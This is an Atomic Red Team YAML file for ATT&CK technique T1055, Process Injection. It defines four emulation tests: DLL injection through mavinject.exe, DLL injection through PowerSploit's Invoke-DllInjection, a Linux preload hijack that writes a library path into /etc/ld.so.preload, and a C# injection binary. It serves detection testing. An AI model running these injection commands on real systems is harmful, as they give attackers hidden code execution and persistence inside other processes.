Files
atomic-red-team/atomics/T1055/T1055.yaml
T

87 lines
2.3 KiB
YAML

---
attack_technique: T1055
display_name: Process Injection
atomic_tests:
- name: Process Injection via mavinject.exe
description: |
Windows 10 Utility To Inject DLLS
supported_platforms:
- windows
input_arguments:
dll_payload:
description: DLL to Inject
type: Path
default: C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll
process_id:
description: PID of input_arguments
type: Int
default: $pid
executor:
name: powershell
elevation_required: true
command: |
mavinject #{process_id} /INJECTRUNNING #{dll_payload}
- name: Process Injection via PowerSploit
description: |
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
supported_platforms:
- windows
input_arguments:
dll_payload:
description: DLL to Inject
type: Path
default: T1055.dll
process_id:
description: PID of input_arguments
type: Int
default: $pid
executor:
name: powershell
elevation_required: true
command: |
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
- name: Shared Library Injection via /etc/ld.so.preload
description: |
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
supported_platforms:
- linux
input_arguments:
path_to_shared_library:
description: Path to a shared library object
type: Path
default: /tmp/evil_module.so
executor:
name: bash
command: |
echo #{path_to_shared_library} > /etc/ld.so.preload
- name: Process Injection via C#
description: |
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
supported_platforms:
- windows
input_arguments:
exe_binary:
description: Output Binary
type: Path
default: T1055.exe
executor:
name: command_prompt
command: |
.\bin\#{exe_binary}